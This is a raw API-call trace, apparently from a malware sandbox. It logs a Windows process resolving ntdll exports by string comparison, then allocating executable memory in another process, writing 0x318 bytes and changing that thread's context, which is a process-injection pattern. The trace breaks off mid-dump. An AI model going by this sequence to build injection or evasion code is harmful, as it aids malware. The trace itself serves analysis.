[0077.827] lstrcmpA (lpString1="LdrFastFailInLoaderCallout", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="LdrFindEntryForAddress", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="LdrFindResourceDirectory_U", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="LdrFindResourceEx_U", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="LdrFindResource_U", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="LdrFlushAlternateResourceModules", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="LdrGetDllDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="LdrGetDllFullName", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="LdrGetDllHandle", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="LdrGetDllHandleByMapping", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="LdrGetDllHandleByName", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="LdrGetDllHandleEx", lpString2="ZwProtectVirtualMemory") returned -1 [0077.827] lstrcmpA (lpString1="LdrGetDllPath", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrGetFailureData", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrGetFileNameFromLoadAsDataTable", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrGetKnownDllSectionHandle", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrGetProcedureAddress", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrGetProcedureAddressEx", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrGetProcedureAddressForCaller", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrInitShimEngineDynamic", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrInitializeThunk", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrLoadAlternateResourceModule", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrLoadAlternateResourceModuleEx", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrLoadDll", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrLockLoaderLock", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrOpenImageFileOptionsKey", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrProcessInitializationComplete", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrProcessRelocationBlock", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrProcessRelocationBlockEx", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptions", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptionsEx", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrQueryImageFileKeyOption", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrQueryModuleServiceTags", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrQueryOptionalDelayLoadedAPI", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrQueryProcessModuleInformation", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrRegisterDllNotification", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrRemoveDllDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrRemoveLoadAsDataTable", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrResFindResource", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrResFindResourceDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrResGetRCConfig", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrResRelease", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrResSearchResource", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrResolveDelayLoadedAPI", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrResolveDelayLoadsFromDll", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrRscIsTypeExist", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrSetAppCompatDllRedirectionCallback", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrSetDefaultDllDirectories", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrSetDllDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrSetDllManifestProber", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrSetImplicitPathOptions", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrSetMUICacheType", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrShutdownProcess", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrShutdownThread", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrStandardizeSystemPath", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrSystemDllInitBlock", lpString2="ZwProtectVirtualMemory") returned -1 [0077.828] lstrcmpA (lpString1="LdrUnloadAlternateResourceModule", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="LdrUnloadAlternateResourceModuleEx", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="LdrUnloadDll", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="LdrUnlockLoaderLock", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="LdrUnregisterDllNotification", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksum", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksumEx", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="LdrpResGetMappingSize", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="LdrpResGetResourceDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="MD4Final", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="MD4Init", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="MD4Update", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="MD5Final", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="MD5Init", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="MD5Update", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="NlsAnsiCodePage", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="NlsMbCodePageTag", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="NlsMbOemCodePageTag", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="NtAcceptConnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="NtAccessCheck", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="NtAccessCheckAndAuditAlarm", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="NtAccessCheckByType", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="NtAccessCheckByTypeAndAuditAlarm", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="NtAccessCheckByTypeResultList", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarm", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarmByHandle", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="NtAddAtom", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="NtAddAtomEx", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="NtAddBootEntry", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="NtAddDriverEntry", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="NtAdjustGroupsToken", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="NtAdjustPrivilegesToken", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="NtAdjustTokenClaimsAndDeviceGroups", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="NtAlertResumeThread", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="NtAlertThread", lpString2="ZwProtectVirtualMemory") returned -1 [0077.829] lstrcmpA (lpString1="NtAlertThreadByThreadId", lpString2="ZwProtectVirtualMemory") returned -1 [0077.830] lstrcmpA (lpString1="NtAllocateLocallyUniqueId", lpString2="ZwProtectVirtualMemory") returned -1 [0077.830] lstrcmpA (lpString1="NtAllocateReserveObject", lpString2="ZwProtectVirtualMemory") returned -1 [0077.830] lstrcmpA (lpString1="NtAllocateUserPhysicalPages", lpString2="ZwProtectVirtualMemory") returned -1 [0077.830] lstrcmpA (lpString1="NtAllocateUuids", lpString2="ZwProtectVirtualMemory") returned -1 [0077.830] lstrcmpA (lpString1="NtAllocateVirtualMemory", lpString2="ZwProtectVirtualMemory") returned -1 [0077.830] lstrcmpA (lpString1="NtAlpcAcceptConnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0077.830] lstrcmpA (lpString1="NtAlpcCancelMessage", lpString2="ZwProtectVirtualMemory") returned -1 [0077.830] lstrcmpA (lpString1="NtAlpcConnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0077.830] lstrcmpA (lpString1="NtAlpcConnectPortEx", lpString2="ZwProtectVirtualMemory") returned -1 [0077.830] lstrcmpA (lpString1="NtAlpcCreatePort", lpString2="ZwProtectVirtualMemory") returned -1 [0077.830] lstrcmpA (lpString1="NtAlpcCreatePortSection", lpString2="ZwProtectVirtualMemory") returned -1 [0077.830] lstrcmpA (lpString1="NtAlpcCreateResourceReserve", lpString2="ZwProtectVirtualMemory") returned -1 [0077.830] lstrcmpA (lpString1="NtAlpcCreateSectionView", lpString2="ZwProtectVirtualMemory") returned -1 [0077.830] lstrcmpA (lpString1="NtAlpcCreateSecurityContext", lpString2="ZwProtectVirtualMemory") returned -1 [0077.830] lstrcmpA (lpString1="NtAlpcDeletePortSection", lpString2="ZwProtectVirtualMemory") returned -1 [0077.830] lstrcmpA (lpString1="NtAlpcDeleteResourceReserve", lpString2="ZwProtectVirtualMemory") returned -1 [0077.830] lstrcmpA (lpString1="NtAlpcDeleteSectionView", lpString2="ZwProtectVirtualMemory") returned -1 [0077.830] lstrcmpA (lpString1="NtAlpcDeleteSecurityContext", lpString2="ZwProtectVirtualMemory") returned -1 [0077.830] lstrcmpA (lpString1="NtAlpcDisconnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0077.830] lstrcmpA (lpString1="NtAlpcImpersonateClientContainerOfPort", lpString2="ZwProtectVirtualMemory") returned -1 [0077.830] lstrcmpA (lpString1="NtAlpcImpersonateClientOfPort", lpString2="ZwProtectVirtualMemory") returned -1 [0077.830] lstrcmpA (lpString1="NtAlpcOpenSenderProcess", lpString2="ZwProtectVirtualMemory") returned -1 [0077.830] lstrcmpA (lpString1="NtAlpcOpenSenderThread", lpString2="ZwProtectVirtualMemory") returned -1 [0077.830] lstrcmpA (lpString1="NtAlpcQueryInformation", lpString2="ZwProtectVirtualMemory") returned -1 [0077.830] lstrcmpA (lpString1="NtAlpcQueryInformationMessage", lpString2="ZwProtectVirtualMemory") returned -1 [0077.830] lstrcmpA (lpString1="NtAlpcRevokeSecurityContext", lpString2="ZwProtectVirtualMemory") returned -1 [0077.830] lstrcmpA (lpString1="NtAlpcSendWaitReceivePort", lpString2="ZwProtectVirtualMemory") returned -1 [0077.830] lstrcmpA (lpString1="NtAlpcSetInformation", lpString2="ZwProtectVirtualMemory") returned -1 [0077.830] lstrcmpA (lpString1="NtApphelpCacheControl", lpString2="ZwProtectVirtualMemory") returned -1 [0077.830] lstrcmpA (lpString1="NtAreMappedFilesTheSame", lpString2="ZwProtectVirtualMemory") returned -1 [0077.830] lstrcmpA (lpString1="NtAssignProcessToJobObject", lpString2="ZwProtectVirtualMemory") returned -1 [0077.830] lstrcmpA (lpString1="NtAssociateWaitCompletionPacket", lpString2="ZwProtectVirtualMemory") returned -1 [0077.831] lstrcmpA (lpString1="NtCallbackReturn", lpString2="ZwProtectVirtualMemory") returned -1 [0077.831] lstrcmpA (lpString1="NtCancelIoFile", lpString2="ZwProtectVirtualMemory") returned -1 [0077.831] lstrcmpA (lpString1="NtCancelIoFileEx", lpString2="ZwProtectVirtualMemory") returned -1 [0077.831] lstrcmpA (lpString1="NtCancelSynchronousIoFile", lpString2="ZwProtectVirtualMemory") returned -1 [0077.831] lstrcmpA (lpString1="NtCancelTimer", lpString2="ZwProtectVirtualMemory") returned -1 [0077.831] lstrcmpA (lpString1="NtCancelTimer2", lpString2="ZwProtectVirtualMemory") returned -1 [0077.831] lstrcmpA (lpString1="NtCancelWaitCompletionPacket", lpString2="ZwProtectVirtualMemory") returned -1 [0077.831] lstrcmpA (lpString1="NtClearEvent", lpString2="ZwProtectVirtualMemory") returned -1 [0077.831] lstrcmpA (lpString1="NtClose", lpString2="ZwProtectVirtualMemory") returned -1 [0077.831] lstrcmpA (lpString1="NtCloseObjectAuditAlarm", lpString2="ZwProtectVirtualMemory") returned -1 [0077.831] lstrcmpA (lpString1="NtCommitComplete", lpString2="ZwProtectVirtualMemory") returned -1 [0077.831] lstrcmpA (lpString1="NtCommitEnlistment", lpString2="ZwProtectVirtualMemory") returned -1 [0077.831] lstrcmpA (lpString1="NtCommitTransaction", lpString2="ZwProtectVirtualMemory") returned -1 [0077.831] lstrcmpA (lpString1="NtCompactKeys", lpString2="ZwProtectVirtualMemory") returned -1 [0077.831] lstrcmpA (lpString1="NtCompareObjects", lpString2="ZwProtectVirtualMemory") returned -1 [0077.831] lstrcmpA (lpString1="NtCompareTokens", lpString2="ZwProtectVirtualMemory") returned -1 [0077.831] lstrcmpA (lpString1="NtCompleteConnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0077.831] lstrcmpA (lpString1="NtCompressKey", lpString2="ZwProtectVirtualMemory") returned -1 [0077.831] lstrcmpA (lpString1="NtConnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0077.832] VirtualFree (lpAddress=0x26c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.839] NtAllocateVirtualMemory (in: ProcessHandle=0x1dc, BaseAddress=0x5df0c0*=0x0, ZeroBits=0x0, RegionSize=0x5df0bc*=0x318, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x5df0c0*=0x700000, RegionSize=0x5df0bc*=0x1000) returned 0x0 [0077.839] NtGetContextThread (in: ThreadHandle=0x1d8, Context=0x5df0f0 | out: Context=0x5df0f0*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x100003, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x47, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x88, [65]=0x86, [66]=0x76, [67]=0xce, [68]=0xfe, [69]=0xf, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x40, [74]=0x45, [75]=0x73, [76]=0xf6, [77]=0x7f, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x100, SegGs=0x40000000, SegFs=0x73b43440, SegEs=0x7ff6, SegDs=0xda67f978, Edi=0x9e, Esi=0x0, Ebx=0x0, Edx=0x73454000, Ecx=0x7ff6, Eax=0x73454000, Ebp=0x7ff6, Eip=0x73454000, SegCs=0x7ff6, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x40, [45]=0x34, [46]=0xb4, [47]=0x73, [48]=0xf6, [49]=0x7f, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0077.840] NtWriteVirtualMemory (in: ProcessHandle=0x1dc, BaseAddress=0x700000, Buffer=0x21a7a28*, NumberOfBytesToWrite=0x318, NumberOfBytesWritten=0x5df0ec | out: Buffer=0x21a7a28*, NumberOfBytesWritten=0x5df0ec*=0x318) returned 0x0 [0077.840] NtSetContextThread (ThreadHandle=0x1d8, Context=0x5df0f0*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x100003, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x47, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x70, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x40, [74]=0x45, [75]=0x73, [76]=0xf6, [77]=0x7f, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x100, SegGs=0x40000000, SegFs=0x73b43440, SegEs=0x7ff6, SegDs=0xda67f978, Edi=0x9e, Esi=0x0, Ebx=0x0, Edx=0x73454000, Ecx=0x7ff6, Eax=0x73454000, Ebp=0x7ff6, Eip=0x73454000, SegCs=0x7ff6, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, 